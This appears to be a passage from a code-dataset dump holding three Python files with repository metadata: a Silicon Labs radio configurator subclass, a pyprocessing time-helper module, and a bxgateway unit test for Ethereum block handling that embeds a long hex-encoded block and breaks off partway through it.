| 72.344428 | 815 | 0.697319 | 5,985 | 49,990 | 5.822055 | 0.071178 | 0.022672 | 0.056479 | 0.063539 | 0.926474 | 0.92481 | 0.92481 | 0.92481 | 0.924523 | 0.910059 | 0 | 0.00529 | 0.25121 | 49,990 | 690 | 816 | 72.449275 | 0.925598 | 0.004481 | 0 | 0 | 0 | 0.139073 | 0.810216 | 0.002524 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.013245 | 0 | 0.15894 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9d35eea637b4e5c49c1bf3da4dc08a685a4bba04 | 149 | py | Python | platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/bobcat/calculators/calc_longrange.py | lmnotran/gecko_sdk | 2e82050dc8823c9fe0e8908c1b2666fb83056230 | ["Zlib"] | 82 | 2016-06-29T17:24:43.000Z | 2021-04-16T06:49:17.000Z | platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/bobcat/calculators/calc_longrange.py | lmnotran/gecko_sdk | 2e82050dc8823c9fe0e8908c1b2666fb83056230 | ["Zlib"] | 6 | 2022-01-12T18:22:08.000Z | 2022-03-25T10:19:27.000Z | platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/bobcat/calculators/calc_longrange.py | lmnotran/gecko_sdk | 2e82050dc8823c9fe0e8908c1b2666fb83056230 | ["Zlib"] | 56 | 2016-08-02T10:50:50.000Z | 2021-07-19T08:57:34.000Z |
from pyradioconfig.parts.ocelot.calculators.calc_longrange import CALC_longrange_ocelot
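# Bobcat part: the long-range calculations are inherited unchanged from the Ocelot implementation.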
class Calc_Longrange_Bobcat(CALC_longrange_ocelot):
pass
| 37.25 | 87 | 0.879195 | 19 | 149 | 6.526316 | 0.578947 | 0.419355 | 0.306452 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.073826 | 149 | 4 | 88 | 37.25 | 0.898551 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 8 |
19b469b333f78863134194fa2dce493c51836225 | 469 | py | Python | pyprocessing/time.py | MikkMakk88/pyprocessing | a09965ab78f2c0209b66dd84d90892575498dc2a | ["MIT"] | null | null | null | pyprocessing/time.py | MikkMakk88/pyprocessing | a09965ab78f2c0209b66dd84d90892575498dc2a | ["MIT"] | null | null | null | pyprocessing/time.py | MikkMakk88/pyprocessing | a09965ab78f2c0209b66dd84d90892575498dc2a | ["MIT"] | null | null | null |
import datetime
import time
from pyprocessing import pp
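# Thin wrappers mirroring Processing's time API: current wall-clock fields, plus millis() since sketch start.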
def second():
return datetime.datetime.now().second
def minute():
return datetime.datetime.now().minute
def hour():
return datetime.datetime.now().hour
def day():
return datetime.datetime.now().day
def month():
return datetime.datetime.now().month
def year():
return datetime.datetime.now().year
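# Milliseconds elapsed since the sketch started (pp.start_time_ns is presumably captured at startup).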
def millis():
return int((time.time_ns() - pp.start_time_ns) / 1_000_000)
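millis() is the only function here with real arithmetic: it converts a nanosecond delta to whole milliseconds. A standalone sketch of the same pattern, with a local start_time_ns standing in for pp.start_time_ns (an assumption; the real attribute is set by pyprocessing at startup):

import time

start_time_ns = time.time_ns()  # stand-in for pp.start_time_ns

def elapsed_millis():
    # 1 ms == 1_000_000 ns, so integer-divide the nanosecond delta
    return (time.time_ns() - start_time_ns) // 1_000_000

time.sleep(0.05)
print(elapsed_millis())  # roughly 50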
| 14.212121 | 63 | 0.692964 | 64 | 469 | 5 | 0.328125 | 0.2625 | 0.4125 | 0.46875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018135 | 0.176972 | 469 | 32 | 64 | 14.65625 | 0.810881 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.411765 | true | 0 | 0.176471 | 0.411765 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
19cfdce64872c8ec2b9e413bacfb19cfb90b7269 | 136,019 | py | Python | test/unit/connections/eth/test_eth_connection_protocol.py | doubleukay/bxgateway | ac01fc9475c039cf4255576dd4ecd6bff6c48f69 | ["MIT"] | 21 | 2019-11-06T17:37:41.000Z | 2022-03-28T07:18:33.000Z | test/unit/connections/eth/test_eth_connection_protocol.py | doubleukay/bxgateway | ac01fc9475c039cf4255576dd4ecd6bff6c48f69 | ["MIT"] | 4 | 2019-11-06T22:08:00.000Z | 2021-12-08T06:20:51.000Z | test/unit/connections/eth/test_eth_connection_protocol.py | doubleukay/bxgateway | ac01fc9475c039cf4255576dd4ecd6bff6c48f69 | ["MIT"] | 10 | 2020-08-05T15:58:16.000Z | 2022-02-07T23:51:10.000Z |
import time
from mock import MagicMock
import blxr_rlp as rlp
from bxcommon.utils.object_hash import Sha256Hash
from bxcommon.messages.eth.serializers.block_header import BlockHeader
from bxcommon.models.blockchain_peer_info import BlockchainPeerInfo
from bxcommon.network.ip_endpoint import IpEndpoint
from bxcommon.test_utils.abstract_test_case import AbstractTestCase
from bxcommon.constants import LOCALHOST
from bxcommon.test_utils import helpers
from bxcommon.utils import convert
from bxgateway.testing import gateway_helpers
from bxgateway.connections.eth.eth_node_connection_protocol import EthNodeConnectionProtocol
from bxgateway.messages.eth.protocol.new_block_eth_protocol_message import NewBlockEthProtocolMessage
from bxgateway.testing.mocks import mock_eth_messages
from bxgateway.testing.mocks.mock_gateway_node import MockGatewayNode
from bxcommon.utils.blockchain_utils.eth import crypto_utils
from bxgateway.utils.eth.rlpx_cipher import RLPxCipher
from bxgateway.utils.stats.gateway_bdn_performance_stats_service import gateway_bdn_performance_stats_service
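# Helper: builds a dummy block whose header timestamp drives msg_block's freshness check in the tests below.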
def _block_with_timestamp(timestamp):
nonce = 5
header = mock_eth_messages.get_dummy_block_header(5, int(timestamp))
block = mock_eth_messages.get_dummy_block(nonce, header)
return block
class EthConnectionProtocolTest(AbstractTestCase):
def setUp(self):
opts = gateway_helpers.get_gateway_opts(
8000,
include_default_eth_args=True,
)
if opts.use_extensions:
helpers.set_extensions_parallelism()
self.node = MockGatewayNode(opts)
self.node.block_processing_service = MagicMock()
self.connection = MagicMock()
gateway_helpers.add_blockchain_peer(self.node, self.connection)
self.connection.node = self.node
self.connection.peer_ip = LOCALHOST
self.connection.peer_port = 8001
self.connection.network_num = 2
self.connection.endpoint = IpEndpoint(self.connection.peer_ip, self.connection.peer_port)
self.node.blockchain_peers.add(BlockchainPeerInfo(self.connection.peer_ip, self.connection.peer_port))
gateway_bdn_performance_stats_service.set_node(self.node)
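# A throwaway RLPx cipher built from dummy keys lets the protocol object be constructed without a real handshake.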
dummy_private_key = crypto_utils.make_private_key(helpers.generate_bytearray(111))
dummy_public_key = crypto_utils.private_to_public_key(dummy_private_key)
is_handshake_initiator = True
self.rlpx_cipher = RLPxCipher(
is_handshake_initiator, dummy_private_key, dummy_public_key
)
self.sut = EthNodeConnectionProtocol(self.connection, is_handshake_initiator, self.rlpx_cipher)
def test_msg_block_success(self):
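# Header timestamp lands one second inside the acceptance window (now + 1 - ignore_count * interval), so the gateway should queue the block.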
message = NewBlockEthProtocolMessage(
None,
_block_with_timestamp(
time.time() + 1 - self.node.opts.blockchain_ignore_block_interval_count * self.node.opts.blockchain_block_interval
),
10
)
message.serialize()
self.sut.msg_block(message)
self.node.block_processing_service.queue_block_for_processing.assert_called_once()
def test_msg_block_too_old(self):
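# The same arithmetic shifted two seconds earlier puts the timestamp just outside the window, so the block must be ignored as stale.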
message = NewBlockEthProtocolMessage(
None,
_block_with_timestamp(
time.time() - 1 - self.node.opts.blockchain_ignore_block_interval_count * self.node.opts.blockchain_block_interval
),
10
)
message.serialize()
self.sut.msg_block(message)
self.node.block_processing_service.queue_block_for_processing.assert_not_called()
def test_msg_block_in_recovery(self):
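# The block is already registered with the recovery service, so msg_block should not queue it for processing again.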
message = NewBlockEthProtocolMessage(None, _block_with_timestamp(time.time()), 10)
self.node.block_recovery_service.add_block(
message.rawbytes(), message.block_hash(), [1], []
)
self.sut.msg_block(message)
self.node.block_processing_service.queue_block_for_processing.assert_not_called()
def test_msg_block(self):
msg_block_str = "fa01000b" \
"f9fffd" \
"f9021c" \
"a0339ac0ec176c7528a12825486a79af50e9593d4f876d0535d8aa62629429e562a0ebee8e2aee4c77a4efea0f2cd04201bde4cdba5b29155dc7aafaf1899c2ac282941ad91ee08f21be3de0ba2ba6918e714da6b45836a0121fea70b58f71501b5d588e300d92115fe4e44380e3e768a3631b741839aebea03845aefb89dd66b34f0bd31b983d0dda2009c10331be6f47e8d70005f8d9c313a0f279979f439decba98430df5ece135a9cdc123d178581dcf75d53534c64e8327b9010009ea23047fb45732d7a13783ae83d836985694f0889e2024dc81b0d889fb472db0441bd948bb8bb480027b92730e3bce92285247dc8f992d00a1961110e8220c5288512062322123cc5eb198ee9162f251ab4302bd587ac60791963482ecf59953d0c156a64a8a81516453009212e8d0f65ab0659c496ecb5f8c54373348da616c006c10074b7c7695c81a16a5b21916de8465912137147c41263ce6a2988d1147c39d4a70042e40213f639c8ecb1d409f7986b021bb8832e083720a2e1bc5344799a7fb41f6c2693ea014305c6b3add1d8a03513fcf6a725eceb98344c22a24eff1a96cf969d5e08258ec658eb4668844aba7cfd9d961daf07753a2d4ea3eb687181f7f146d6eb683bbb0d783e48a4383e4896b846083907a9b486976656f6e2072752d626c6f636b636861696e2d6e6f64652d33a00ed11397c96f91753ed1fa9ac67239385b287cdd57cd7c3d3fb5bb898c58e638884bd45f329c773511f9fbc0f9013482024f8561c9f3680083056fda94601ce3bb299e4ee04218fdbcd5660d35f777760b8806f05b59d3b20000b8c4ef66f725000000000000000000000000000000000000000000000000000000031d102136000000000000000000000000000000000000000000000000000000006161ce9e00000000000000000000000000000000000000000000000000000000000000600000000000000000000000000000000000000000000000000000000000000002000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2000000000000000000000000c8fd44d16ef3180716b38d4405b2619b8162e02226a0cf8f7aa9878921cb651b90d806a0ca99a9cd80d31c7530d7cd697b7dd71106bea01f52a1453601d3549838d3d98431a29e432add3ab41c873bf7a0026fe701f1b9f901521f8545d964b80083030166947a250d5630b4cf539739df2c5dacb4c659f2488d880de0b6b3a7640000b8e47ff36ab5000000000000000000000000000000000000009aa89f55c54582d957c30c84a4000000000000000000000000000000000000000000000000000000000000008000000000000000000000000078c087e272535a133594fd451d4468712554941800000000000000000000000000000000000000000000000000000000608391400000000000000000000000000000000000000000000000000000000000000002000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2000000000000000000000000c8fd44d16ef3180716b38d4405b2619b8162e02225a02354841d0979df8bf1c40002c7e22b7a4a97bf7e0eee8ae20f599321db3cea20a0084ff882f0042ccabb688abebd60c8e8d134faa74503fd582a39e6b8722949f5f86e83016beb852e90edd0008252089454dfa3d824c0f4ea15e8bea178a2acab1be4c267873282d2a1831c008026a078ab9bd673b12c7eaf6d4dbb67f7ffc8d0a68811576123c9cbb0e981fc86167ba04d46a2309eb28f800c0222f0b5ac3da1b0ba82dc7748f2490800523b66ad76fbf9014c822db7852540be4000830493e0945fdcca53617f4d2b9134b29090c87d01058e27e980b8e4dd2414d400000000000000000000000055b926cbf05b9676eb2f28f6d7fd91394b4fc72e03b95dfa29ed2fbb14db7052e5b0ea2c60a3b4fddb00c98ca031bc613272699d000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000414e26ba24f2b9b83e668d9e913a091adffadceccff9400abf19a6367c02634beb30a2884aeff0bd0c4bc8842a139d6dd49747ed4285f511629966de459f3a3ff61b0000000000000000000000000000000000000000000000000000000000000025a08406089757b6e5d12338dfe6330096fd8da0e92ab523119251a12df89c15560da0032b5ede43fefba84a1cab0afe77cbd2e2d69bdd7e00705b5c7c7af8d686e0e7f8ab82058b85246139ca8082bd2c94dac17f958d2ee523a2206206994597c13d831ec780b844a9059cbb000000000000000000000000d6eb4f331a08f0406083ee488f97a76313e6d5bd0000000000000000000000000000000000000000000000000000000002faf0801ca010bc9da8a60bd29978f0836f2f8f35db812535ea331f49d456fe67
50b1d1b3c4a07d84d39948732eb53db12d334977b4e11d3f288aa93b9815719f4c085810fc68f8cc820427851fc808b5008303d09094dac17f958d2ee523a2206206994597c13d831ec780b86423b872dd0000000000000000000000007549611666f9817f1404353a982b28e37d8d143d0000000000000000000000004c8cfe078a5b989cea4b330197246ced82764c6300000000000000000000000000000000000000000000000000000008b47058c025a0c20ea54ca4e7e5bacef4d7719a17b5c322a498fdbf23d301c8a7be8843016c84a0645d88e8f1f0f77d44fc0e65d3973321a54513a6a2ab5fb84c726cb980a14e2df86c08851faa3b500082520894a7efae728d2936e78bda97dc267687568dd593f3884035eeec19776400801ca02297e9487e436f0cc82d90e64d47f941f8149aee1d366127904d5a5828f0a6cea058662de1bc2fcabd119bb9f0c831a6c1f5f76617b701f70c90d6e0c9b4ad89a8f8ad8319cee6851f3305bc00830668a094a0b73e1ff0b80914ab6fe0444e65848c4c34450b80b844a9059cbb000000000000000000000000bf5ae133b9a0fc1a07952a7df2afa21f7f69ef580000000000000000000000000000000000000000000000000000014b392375001ca0f710f31876e0f5b84e6c9edd1c7836dd5bbec17e20a1774e01a9a64edef793b7a07e8148401b05b2bd2e784cbfd22b81e64eba002aa86daebcf1f2db6250265976f86b80851d1a94a2008252089440c3a1146e78564589939b27d72e134abe760164874e848f7d4080008026a036282556fe1f985f26c33e0b803605430981319f78668b95489b7bcbcdf0b51fa0692d0ada42653377dd51211e05d7a54d445ccc9b729d77d5bf95ff3f5f2c3642f8a953851d1a94a20082bc8394a0b86991c6218b36c1d19d4a2e9eb0ce3606eb4880b844a9059cbb0000000000000000000000002ecb7cf6a9a05773ed759d42e603dcb9aafffe6f0000000000000000000000000000000000000000000000000000000011a11a2d26a0f8f23557e1881b9133f2ef7e49681d2ac7cd1d5d79eda69d3e3a91e764aa09f3a06dd9d06f4444f7889c2e977f57b68d9c36275cf436e5102e686df3581f2ec9bcf8a92c851d1a94a20082d83194dac17f958d2ee523a2206206994597c13d831ec780b844a9059cbb0000000000000000000000002ecb7cf6a9a05773ed759d42e603dcb9aafffe6f0000000000000000000000000000000000000000000000000000000114e8e70225a0a4bb66ffcbf3055a2ca5d006cfc77379bce72308b1fc6bf7a2f4c5222d7ac0ffa0638d2d4dbb6b3e357ae468883efb8b9834d11374b4957714022a9cc9b2be40f2f86b0d851d1a94a200825208942ecb7cf6a9a05773ed759d42e603dcb9aafffe6f8782529a624c64008026a06882e00f11eb183c6ee7b734129678ca9a94d5e7588c122dcb883fbf9c9c02efa0234db93c01a56256ac4930d7f520521ec6f024bb1ac09db376ada1f8b7a18edaf8a913851d1a94a20082e48094a0b86991c6218b36c1d19d4a2e9eb0ce3606eb4880b844a9059cbb0000000000000000000000002ecd8c7c525c09a613f2e66b05ca065ebbb232ac000000000000000000000000000000000000000000000000000000001471c3c025a0b6ff2d306a6d9c7bab0e938bd2891a0f7c2d956bf80448924639de74708e6620a02048d147b33429d8e053000b14d9c363c82d8a299ea27bbcb5703ecd8d9b5117f8ab8201dc851d1a94a20082e48094a0b86991c6218b36c1d19d4a2e9eb0ce3606eb4880b844a9059cbb0000000000000000000000003a03f1e985f6e31c6e14dbdc351fba2e0ba3523c0000000000000000000000000000000000000000000000000000000011a3fdfa25a0b8e5cb506c3e2e002905fb3d45495a30539af47271c930e1a784c9555da04e71a077cb9d73b3c9225c17d19e659854b2c5906e1ebacc656f795e9103d25d630c81f8ac820f66851d1a94a2008301284a94dac17f958d2ee523a2206206994597c13d831ec780b844a9059cbb0000000000000000000000001f8df7eb4c3581a73b59fdc202b18acaa3ef63050000000000000000000000000000000000000000000000000000000008cbc06d25a0a5e4fb533bb17c661987365bb5c7899dc09749067fbf9fbac516c5c1c4b4f866a05f35f1e5370d3b3f0f7940c640137ca760ba3e8e9d043965d7c37a057dc34871f9016d822ce1851ca35f0e0083023749947a250d5630b4cf539739df2c5dacb4c659f2488d80b9010418cbafe500000000000000000000000000000000000000000813f3978f894098440000000000000000000000000000000000000000000000000000000162e513dfb8a08900000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000887b86b6b6957f7bbea88b8cefd392f3923
6a88c000000000000000000000000000000000000000000000000000000006083950d0000000000000000000000000000000000000000000000000000000000000002000000000000000000000000761d38e5ddf6ccf6cf7c55759d5210750b5d60f3000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc226a0a6dc2f250a8abd258f1076fd46a445314d961f39f942cf0ae62cc215d6771659a03837ed678e8584f77731810638e77f5bbe880a4571128ad0279b5da67a57d272f86f830b424d851c70b51580825208941a793431b47691a298e3929595ac42281264d90d8802386f26fc1000008026a0cd8fb8ee9a8d972c8ab5dcf71017a5f665ec98972a7586c7b042753d5d190c84a07072062ddd2afd11b15fd671e84cb4291d6a630244104e8e443cfc1045cd5118f9022d823d66851bf08eb0078303799494fad95b6089c53a0d1d861eabfaadd8901b0f853380b901c4d52f7a760000000000000000000000004cd647a09a7198fab0e6e85442732479e3be7ab9000000000000000000000000000000000000000000000000002715c9ab73c6710000000000000000000000000000000000000000000000001bc16d674ec80000000000000000000000000000000000000000000000000003ec4cdc34772ef0af000000000000000000000000000000000000000000000004fd51c10f4aeed5eb00000000000000000000000000000000000000000000000068155a43676e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000044db937d83f2e480aac453f851caf373b607054d0000000000000000000000001d3d5e2ced1afbb2ca00a7834a287b7bb480de980000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002669d58ec107775c6000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000056bc75e2d630fffff25a01564b9d24d66721fbd091ca9a4475145a6e465218e6e9272a26a35f784bb96c4a04305db01884fed92b636d86f99cf4b1ac414adf26dd957a8a0230057ee83665ff8ad8345c742851bf08eb00083032918948762db106b2c2a0bccb3a80d1ed41273552616e880b844a9059cbb000000000000000000000000b98232c3e43aa16a9d28350ac279eed519aae21300000000000000000000000000000000000000000000413c5874e314a7ac000025a0ab79f1e5b33ee075404b077bb42ac84d494f07e442a95afd8c999270d55c8c19a0048ded1de566473e53cc3b75a4619dcab649eecaba75777e80d6388c7fef5871f8ad83472f16851bf08eb00083032918948762db106b2c2a0bccb3a80d1ed41273552616e880b844a9059cbb000000000000000000000000119e73835a8a3750d8bb5ec02bda3cc89afd01cf000000000000000000000000000000000000000000001359efe3822b24cf000026a0251de469326a59a2b4899427454f91254313077ea7f080eecc976b5e2e0e7a7da07a7ad1beeec0ea1844b820889fb67a2911c3fc32d87aebd6a27b5b68dde15b8af8ad830e8346851bf08eb0008303291894a0b86991c6218b36c1d19d4a2e9eb0ce3606eb4880b844a9059cbb000000000000000000000000bd48d64f0ed91604a96937894b978106c4088ab2000000000000000000000000000000000000000000000000000000000ba4f2c626a03106a50040c35b3fd3b6615cc72733f2e5df6ab68891d0a6fce772d5d23052e2a07dfc5041571ae64b9fbe1ea767e16432bc57210e6f1c6c1f72381e7f75b37a40f86a80851bf08eb00082520894093ca6d2cde5629cf6e0e4322a3df693a39649f78640cadae4d0008026a0a15acd78c3185833e2ada7def5796f4d97dcb3799e7d27e32fe0236abd239e20a05e4e687056b052c09f96df121068b6301487908b807f75ac19dd7f255c3c6b5ff8ad83708966851bf08eb0008303291894a0b86991c6218b36c1d19d4a2e9eb0ce3606eb4880b844a9059cbb000000000000000000000000604a1bea12db7f66d282e86d99af26c285a363500000000000000000000000000000000000000000000000000000000000e4e1c026a08b96d7ccb2c4d71dab406bbfba6a7cc066d2b922f1905accd8bd0fb030d8785ca050a58b43695f3a58d2adf5bbe359401cca50958b268203f748eec835acc3dbecf8ad8345c743851bf08eb0008303291894a0b86991c6218b36c1d19d4a2e9eb0ce3606eb4880b844a9059cbb00000000000000000000000077da988c54e1a4cd02c9e66f8f54d940b5f371fe0000000000000000000000000000000000000000000000
00000000003a19cf5025a06a8ebe589eac9204c0510d9cbf16551bd05a064200518cb33a5d693353942848a04f91b3f339087b95abbbe5fb407a86ae4b40c75cb9801fbc1ce451a926b7310bf9015265851bf08eb0008302c0be947a250d5630b4cf539739df2c5dacb4c659f2488d881bc16d674ec80000b8e47ff36ab5000000000000000000000000000000000000000000000003ec4cdc34772ef0af00000000000000000000000000000000000000000000000000000000000000800000000000000000000000001d3d5e2ced1afbb2ca00a7834a287b7bb480de9800000000000000000000000000000000000000000000000000000000608395120000000000000000000000000000000000000000000000000000000000000002000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc20000000000000000000000004cd647a09a7198fab0e6e85442732479e3be7ab925a0bdb6cab65794d00c0416ae358c03e3311a5a3f5ffc1f0d9d9713ebd302fa9a8aa0141d812ad0818055935ae766c49a9ad54f00432531fae9493999b1379caa71d0f8ec823d67851bf08eb0008302ea1d94fad95b6089c53a0d1d861eabfaadd8901b0f853380b884c23e1a210000000000000000000000004cd647a09a7198fab0e6e85442732479e3be7ab90000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000044db937d83f2e480aac453f851caf373b607054d26a09d73746912cf38004149f2e404e3501c4b6f000cff70f5e0b14aa3cace6cf876a047bfd70f2faa818a29bb3be9dbd281ac458b9b17823f01a4ca87159e948b8336f8ad83128a34851b8b3abf0083011e8194dac17f958d2ee523a2206206994597c13d831ec780b844a9059cbb000000000000000000000000d1ce15e9632416bd0c7936697217404e8e3f5a820000000000000000000000000000000000000000000000000000000129b9a6c026a07f7fda35920deec2a0f1f638153f988893ea681739ff29506dbe1b8bb2959defa05d898e291d9662a2b6a8ed2c847d3106df16da0ff835a8d435c465865b15c1e4f86e82362f851b0223880082520894ca961fa2209dd3579b21ac63238b9397f609adbd8805a0a01a006bc0008026a09339d5ac0c0b92bded83e06130aa59433365b6d03558436db8831ed8437532cca00a8d0bb53e314948baf445b16929f60326a63bce7dd2bed9fc9d725fad420950f86f83045599851af041e5008262709414122fc3400fb9dd2fea50fedb7d3db8aa622dd7880270bac4d3f738008026a0809dfd93ee7092ee7d278ee7ab9ac4a85baaa9d37acc4a7ccd1244a8739639b4a076fd1f03a218092f63e69cb823d6d69e7fe96d1d432235c2ed2d77706339918bf86e8202ab85192b431900830182b894f466dd932b24723ca063f25a22167c24a06e01c48758d15e176280008026a0710106949719bc351a45be93bf7cdd14da4d464fc27d4a0d37448f2895839e2fa05343ce8f5dd4e759941e000e6f961da67835de782fd68b4c4e2bb52f4daf8776f86e8202af85192b431900830182b894cb021ea4bfb0e0a44e25a92da4be499ed283d8db8758d15e176280008026a0fd3dace00c3040bf0e62f570da70e0f7d187450b85772acce4bf83097178dc55a02def002061704ea119d5adcce00114c928e532ab12251043db8335046d507c31f86e8202b385192b431900830182b8944e5637d43f952c545a4ca745b905b1c8d59b2faa8758d15e176280008025a0ab2b599879f3a36e00dca796f608731e90e9c83a37bb525b775564e22e75f870a06cb68800c7690a589a77b13a4d97b1b575cdc88a3f2b1683cda9c5f3919c8824f86e8202a985192b431900830182b8945d0a1e349d47b131992c643ea19fb786edce8b968758d15e176280008026a0490c1a55dde0c7d322d22f07d8554f5186c54731377e4f50882c13a68c28cb06a04093dee68abfdcfa3082d8a58e249078aba8f42efb263f2805991440f84819d8f86e8202ba85192b431900830182b89477baa3ac098f789962990bd20df3314b02cb089e8758d15e176280008026a096d8af8d6afc62c9410016dfd293776c07f1752fe15dcdbeb3b815ef31dfe3f1a01235ba10bf5b761d12528a6d49c81cc9361df44d04fea6c76220a1a861d69257f86e8202a885192b431900830182b8949b7aea693ffb3daecce609d55ddc2ce2decf883d8758d15e176280008025a07dffd8373e486a7cc7589768bc0da9012ee92505705ad6d8776391c2ac2a763fa0721ce349a669aa9cd518a41608c35ece36566413b6eaa84c360725839d0e8c32f86e8202b285192b431900830182b89436f6a8ad2897af02a8e49baf30b1b170a1bb280d8758d15e176280008026a01b7a8c6
29b5d6481571c39c73b54cf323552930da6dd820ac1cb94c4ac6c383ca01f40ea5d9572fc845ea30c4baae7fd71ceb11ec8815e8beaf1f23c5ba0074341f86e8202af85192b431900830182b8944565b01e3353cbb73e8b8decc9a0a37ba5d29ccd8758d15e176280008025a08303739fd0361a7ed821578d71ef876a4343a9774a095a5b8a3f76487b59903da01067ce928f438d18477b4297a7db9b4e9d9af555c885d8987ce82d8db561f649f86e8224e085192b431900830182b894908bd7d41f374a9cb8c775568ea4b9ef4a324ffc8758d15e176280008025a073397a3d11b616ed99460467396744f624042486e4f861e091a903ef87534d15a026e02901a6fee94116cad413950d1ca205d61606f55af5102a794e3194909cf6f8a9488518727cda0082d82394dac17f958d2ee523a2206206994597c13d831ec780b844a9059cbb000000000000000000000000930ba2f1c74b09d2ecd89a1126c08343e2e7ea4a00000000000000000000000000000000000000000000000000000022ecb25c0025a04d8be559323d75741869d60c63776c006e4ec7172d194f6a9b9090bb7acd6f51a04d28ba659dd58493e39a2d11acfdf460f2b71f361cc072eb0b74a7979f71dfeff9015482021e8517bfac7c0083027179947a250d5630b4cf539739df2c5dacb4c659f2488d88016345785d8a0000b8e47ff36ab5000000000000000000000000000000000000000000000000d3c523852704a3930000000000000000000000000000000000000000000000000000000000000080000000000000000000000000f5f6d750896380348949a8aecc119eb3d5bc933a00000000000000000000000000000000000000000000000000000000608394dc0000000000000000000000000000000000000000000000000000000000000002000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc200000000000000000000000095a8a98727272ed6ee7b7834c081e55801dcd9e526a0323b3d18af9815b2fde91799b6eafe1a60853c15eea79416bd6c80593c9f07cea0282ffbe053ed415175aeb81d08e6fb5f7f0f536300e18e393d17ec542cc41ac7f8ac820320851755a3194083014a399456a86d648c435dc707c8405b78e2ae8eb4e60ba480b844a9059cbb0000000000000000000000000d71ed670a5b4d6406c4bfca2a8193282cd19682000000000000000000000000000000000000000000000112695ca45fe358000026a04d8074fc026abc0c3da7fab38d214ed05e7e3ce3f92d53cb4390e26b271caa0ba034059431991fcde3d5481f1586883231e062d756b98edb2af34ac769eb09cedff86c8085174876e8008252089418d8db040906224a905a35573ee4ffc1f6c43b1f881211a21a098f00008026a01812c336b6bc7479d55fb4b289b81fbc278e617f3074d1deeb5ac2a2ff478fdda0401c7f7bf0d4cd76d147858ff8bd399cf5ed0b376a8cb35e133ac773494b95e9f86c8085174876e8008252089418d8db040906224a905a35573ee4ffc1f6c43b1f88016534582cdab0008025a04bd9bcfb1cc2ca8b8998af9b710530286e304289e009b35c2edfce89be10afb1a0757469fa0d2d7968b29bdf7458e5f43d1317fcbefe645d9f5c5f5f08a0a697e3f88b82250d85170cdc1e0083015f909484654be796dad370032391d5479f8f1fd9ddd14e80a4d508e6233efa81024ce00541268afed104edb3ee94253085cdd7c0afdf7e0c08fe379a6525a0d199d006578cf7f06178a0b69c3438a7e8338d0b0afc5999c2db7ef25e2a4d44a06f4b9738691c7ecb99f1d63f9f1f6237c2e521119a09b19700df15dc4a3c0d90f901ab1885170cdc1e0083047f25947a250d5630b4cf539739df2c5dacb4c659f2488d80b90144ded9382a0000000000000000000000004ab49ca803942c341076a29ab110b453123d2ebd0000000000000000000000000000000000000000000016d64c573f7aa72a0cf200000000000000000000000000000000000000000011cfdc15f6a2ea4ebc2e1000000000000000000000000000000000000000000000001d0641178be3447b9a00000000000000000000000074516539dc1a410f4162152f7e6410067b5d472400000000000000000000000000000000000000000000000000000000608394e50000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001b62c91145b0076465f55b62fd72e3e47d575e00f3d2ea97572d03065c70681fa76b3416877c0fee67c0a6212f3a0ac54736e1fa748b53227aa912bb43036d7f4225a017a7dfc17820a1a364e5f9735cdfbb6849413792a22c816d8655e8f7b34c04fda04affc004ebfb32fef222d1046117ae696338eec5555a1a21f8417543450cbad7f88b820c91851689bac8008303
63449439aa39c021dfbae8fac545936693ac917d5e756380a4a0712d6800000000000000000000000000000000000000000000000000000003775a881c26a07aea1209adcf5e987f2208dd155463f2432bc558b081e62670115ee9b95d3117a07bf128c852d9bb511e7b7e585077e0746e8ef6eb54e496299c6a9cf4b2e6325cf86c808516482a1d008252089444f14099b8b9c60515e83a0cb1a85e14982bb09188011c0f287f9e10008025a0388484f19e481b98265e110caf9fe022df71361e268fc3f15834905635862034a069ff3c458fa733d1cc57b2c48de15af4902e5ba670a9424aac2b355e4d3d3bdbf8a980851632b4f3008288b994514910771af9ca656af840dff83e8264ecf986ca80b844a9059cbb00000000000000000000000032e9dc9968fab4c4528165cd37b613dd5d229650000000000000000000000000000000000000000000000002c346d5098229dc0026a0ddc456ee69e18bb06f38451b6846834b1917dcaae611c2a010bf7a027121ae98a04119cd2deae2d34e65791ab79c13bbb4a0797ab8b8caab103e2a6609bfa78efff8ac823d878515a73b620083019a2894dac17f958d2ee523a2206206994597c13d831e